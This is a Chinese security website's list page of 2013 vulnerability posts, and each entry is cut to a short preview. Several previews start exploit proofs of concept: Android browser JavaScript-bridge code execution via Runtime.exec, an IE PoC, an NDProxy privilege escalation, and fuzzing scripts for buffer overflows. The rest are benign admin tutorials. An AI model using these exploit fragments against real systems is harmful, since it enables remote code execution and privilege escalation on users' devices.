- 首页 > 安全 > 系统安全 > 列表
- POC<script>function execute(cmdArgs){ return QQApi.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);}try{ execute(["/system/bin/sh","-c","ec 2013-12-09
- 1. POC <!doctype html> <HTML XMLNS:t ="urn:schemas-microsoft-com:time"> <head> <meta> <?IMPORT namespace="t" implementation="#default#time2"> 2013-12-09
- Linux 系统管理员守则中有这么一条: 慎用 rm -rf 命令,除非你知道此命令所带来的后果 ,不过 Linux 下删除文件并不是真实的删除磁盘分区中的文件,而是将文件的 inode 节点中的扇区指针清除,同时释 2013-12-09
- 今天有人问关于mysql的system()函数提权的问题。网上搜 mysql system(),许多文章都说linux下使用mysql root用户登陆可以使用system 函数执行shell命令,但经过测试后发现其实并非如此。网上所说的使用syste 2013-12-09
- 本教程假设你已有一台在运行的Ubuntu服务器,网络方面已设置好,而且可以通过SSH进行访问。Apache2是许多安装的Linux发行版使用的默认Web服务器。它不是对所有环境来说唯一可用的Web服务器,也不是最佳的Web服务器 2013-12-09
- 最近帮一个朋友看他们的网站安全问题,他们非常担心系统中的数据被篡改,因为一旦篡改可能就别人兑换东西或者套现走了就会造成损失,而最典型的修改一般都是利用事务性不一致和一些数据库中的溢出等错误和直接获取 2013-12-09
- 遨游浏览器被人报了,这个是hd版,还是存在问题啊。 直接给出poc吧 <script>function execute(cmdArgs){ return mmbrowser.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null 2013-12-09
- 连驱动加载都不防的厂商就不吐槽了.最新版本,个人版杀毒软件本来都不想测了,后来想想都下载了不找点问题对得起失去的流量吗? void FuckFilters(WCHAR * Name){UNICODE_STRING TName;PDRIVER_OBJECT TDrvObj;PDEV 2013-12-09
- 公钥基础设施促进安全行业各个部门致力于维护和改善与PKI技术相关的方方面面。从根证书颁发机构到X.509认证,都证明了在保护服务器基础设施及数据方面的成功。 考虑到现代Windows服务器环境中的角色和服务,微 2013-12-09
- 先上EXP和源码, 测试环境: VM下XP SP3 之前有个PoC完整的PoC代码如下:#include <windows.h>#include <stdio.h>int main(){ HANDLE hDev = CreateFile("////.//NDProxy", GENERIC_READ | GENERIC_ 2013-12-09
- QQ 浏览器 for android 在跨域实现上存在缺陷导致漏洞。 原则上从 internet 域禁止访问 file 域,但是 QQ 浏览器在实现上存在缺陷,造成可以从 internet 域访问到 file 域上的文件,如果 file 域上存在一个漏洞文件 2013-12-09
- 目录背景最简单的 Web 物理架构攻击方式总览Web 软件安全攻击防护浏览器安全攻击Cookie 假冒隐藏变量修改跨站脚本攻击服务器安全攻击缓冲区溢出认证逃避非法输入授权逃避SQL 注入异常 2013-12-09
- bdlogicmain.dll缓冲区溢出导致拒绝服务 我猜是strncpy那儿没弄好?STATUS_STACK_BUFFER_OVERRUN encountered(272c.2070): WOW64 breakpoint - code 4000001f (first chance)<script>var s="A";var i=1;for(i=1;i< 2013-12-09
- 有问题不怕,不补才操蛋,忽略我问题的厂商,要是回头偷偷把漏洞给补掉那就别整天装大爷了.提的bug都是你们该知道的,不该知道的也没什么大危害就几个人用而已.这次我再接着搞这个2个文件.还是覆盖替换的套路. // 2013-12-09
- 俺也是遨游的老用户了其实 - - 你故意五天忽略 漏洞还是在那儿 你偷偷修复了 hellip; hellip;结果还是没照顾到这个问题 hellip; hellip;Base+A跟直接地址栏打开网址逻辑不一样是为甚 hellip; hellip;和以前spoof只 2013-12-09
- 背景有时候程序员们需要写一段独立于位置操作的代码,可当作一段数据写到其他进程或者网络中去。该类型代码在它诞生之初就被称为shellcode,在软件利用中黑客们以此获取到shell权限。方法就是通过这样或那样的恶 2013-12-09
- 通过组策略配置Windows电脑是企业中最常见的一项任务。使用组策略设置和配置安全设置是Windows计算机的一大优势。是的,现在很多操作系统都有不相上下的管理机制,但组策略从1998年10月发布的Windows NT 4.0 Servi 2013-12-09
- 漏洞存在于欧鹏浏览器中,不需要root即可,addJavascriptInterface导出多处。 欧鹏浏览器,反编译后com/opera/android/share/ShareInPage.smali中,存在 const-string v1, "ShareInPage" invoke-virtual {p1, v0, 2013-12-09
- 当输入的命令行超过172个字符(后接1个/n),程序发生访问异常。 向ftp server发送如下方式构造的数据包: if s_block_start("body"):s_static("1"*32)s_static("2"*32)s_static("3"*32)s_static("4"*32)s_static( 2013-12-09
- 皮肤文件处理逻辑中多处缺少长度检查存在堆栈溢出 #!/usr/bin/pythonimport sys, time, os,zipfileimagefuzzer="A"*4096imagefuzzer1="A"skinxmltmp="<skin version=/"2/" name=/"fuck/" author=/"fucker/" ur 2013-12-09
粤公网安备 44060402001498号